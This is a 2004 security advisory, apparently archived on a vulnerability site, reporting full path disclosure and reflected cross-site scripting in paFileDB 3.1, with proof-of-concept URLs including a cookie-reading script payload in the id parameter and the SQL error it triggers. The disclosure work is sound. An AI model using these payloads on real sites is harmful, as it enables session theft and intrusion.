advisory-04.txt

advisory-04.txt: Posted Apr 28, 2004; Authored by DarkBicho | Site darkbicho.tk; paFileDB version 3.1 suffers from path disclosure and cross site scripting flaws.; tags | advisory, xss; SHA-256 | d5f47ce4fbc5d389d472a4f2644aa907ce5916533dbd1e734dcb4ffda99b5b1d; Download | Favorite | View

advisory-04.txt

Advisory: http://bichosoft.webcindario.com/advisory-04.txt


#########################################################################
###################### :.: DarkBicho :.: ################################
#                    #
#   PROGRAM: paFileDB              #
#   VERSION: 3.1              #
#   URL: http://www.phparena.net          #
#   BUG: Multiple vulnerabilities          #
#   DATE: 27/04/2004              #
#   AUTHOR: DarkBicho              #
#           WebSite: http://www.darkbicho.tk        #
#           Email: darkbicho@peru.com          #
#           Team: Security Wari Projects <www.swp-zone.org>    #
#                  #
#########################################################################
#########################################################################



1.- Vulnerabilities:
    ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke 
engine scripting files:

Fatal error: Call to undefined function: locbar() in 
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
   ----------------------------


  Cross-Site Scripting in id variable:


  
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>


paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near 
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE 
cat_id = '''


3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "El pisto es y sera peruano"

5.- Contact
    -------

  WEB: http://www.darkbicho.tk
  EMAIL: darkbicho@peru.com


---------------------------------- [ EOF ] 
------------------------------------

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

advisory-04.txt

advisory-04.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

advisory-04.txt

Share This

advisory-04.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems